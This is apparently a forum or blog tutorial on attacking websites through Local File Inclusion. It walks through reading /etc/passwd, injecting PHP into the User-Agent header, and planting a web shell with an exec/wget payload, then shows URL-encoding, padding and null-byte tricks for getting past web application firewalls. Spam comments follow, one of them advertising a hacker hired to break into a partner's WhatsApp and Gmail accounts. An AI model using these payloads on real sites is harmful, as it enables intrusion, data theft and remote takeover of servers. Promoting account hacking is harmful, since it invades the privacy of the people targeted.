Local File Inclusion
Requirments
- Vuln site.
- Tamper data. - https://addons.mozilla.org/sv-se/firefox...mper-data/
- HackBar - https://addons.mozilla.org/en-us/firefox/addon/hackbar/
First of all, check if the site got a vulnerabillity against
Quote:etc/passwdTo do that.
Quote:http://www.site.com/index.php?filename=2Change the number '2' to
Quote:etc/passwdand it will look like this:
Quote:http://www.site.com/index.php?filename=etc/passwdIf it works, it will pop up some type of a code.
It will look like this
Spoiler (Click to View)
Do the same but change to 'Etc/passwd' to
Quote:/proc/self/environ
If it works and the file exist, you'll get something similar but not the same code.
Let's open temper data. To do that press F10 and do as I did here.
![[Image: 3cc30c8dcfa268c457726ec0ec417f93.png]](http://gyazo.com/3cc30c8dcfa268c457726ec0ec417f93.png)
Now when you have temper data up, it would look similar to this.
Spoiler (Click to View)
Click the button 'Start temper' In the top left corner.
![[Image: 853ba2956894a57438d3b8c1dffe0698.png]](http://gyazo.com/853ba2956894a57438d3b8c1dffe0698.png)
When the Tamper is done, you would see a window like this.
![[Image: 76fce75d5c9b019cab1f21f7f7993bba.png]](http://gyazo.com/76fce75d5c9b019cab1f21f7f7993bba.png)
Change your 'User-Agent' to
Quote:<?php phpinfo();?>Now refresh your site.
And this is how it would look like.
Spoiler (Click to View)
Now let us upload out shell.
Start up the Tamper-Data, then click star tamper and go to the 'User-Agent' again.
Type this into the 'User agent field'
Quote:<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
The site will now download your shell. You can locate the shell at website/shell.php
or
http://www.site.com/index.php?filename=shell.php
And you would locate your uploaded shell.
.
WAF aka Web Application Firewalls.
- Vuln site.
- Tamper Data; https://addons.mozilla.org/sv-se/firefox...mper-data/
- Hackbar; https://addons.mozilla.org/en-us/firefox/addon/hackbar/
Today, I'll show you how to bypass a Web applications firewall.
First of all, check if the site got a vulnerabillity against LFI.
In order to do that, change your old vector /etc/passwd to %2fetc%2fpasswd.
Your whole URL aka 'Uniform Resource Locator' would look like this.
Quote:BeggfomercyIsanoob.com/index.php?filename=%2fetc%2fpasswd.
So basicly every '/' will be changed to'%2f' without quotes.
(/=%2f) That's a pretty eazy form to remember, keep that in mind.
This method is called 'URL Encoding.', It can be some kind of algorithm.
As the name says, it will encode the URL and bypass the filters if you got the luck with you.
To bypass the characther limit, you can just do it like this.
Quote:/../etc/passwd/./././././././././././././././././././././././././././././Much more, It depends on the web server.
Null Bytes, this method is pretty eazy and can be really usefull.
Add this to the end of your URL.
Quote:
For exemple.
Quote: .com/index.php?filename=/etc/passwd.You can even add nullbytes instead. This will help you to get around the firewalls, but does'nt always work.
This is just a few methods, it exist so much more. I might cover that in another tutorial.
This does not cover everything, It's just the basics within WAF bypassing, It might of been an error in the tutorial
If so please report it to me.
4 (mga) komento
We support projects that allow groups of the disadvantaged people to support themselves now and in the future (or to improve the conditions for such self-reliance). The projects we support are aimed at cooperation, for example in a cooperative context, and we also support innovative projects that give people the opportunity to improve their prospects and living conditions by practical means. Online Stores In Pakistan
ReplyTransforming the lives of the disabled and less fortunate by giving them hope. Since people who take their own fate into their own hands have stronger position in life, the James MacKay Foundation Inc aims to support socially disadvantaged people anywhere in the world to encourage and increase self - reliance. your own it department
ReplyThe light of the world is not only for those who can see. Dreams are not only for the able-bodied. This is a long term commitment, not only do we have to support them at school and work but we also need the foundation to be there for the students even when their parents are no longer around. digitizing embroidery service
ReplyI Want to use this medium in appreciating cyber golden hacker , after being ripped off my money,he helped me find my cheating lover he helped me hack her WHATSAPP, GMAIL and kik and i got to know that he was cheating on me, in less than 24 hours he helped me out with everything, cybergoldenhacker is trust worthy and affordable contact him on: cybergoldenhacker at gmail dot com
ReplyMag-post ng isang Komento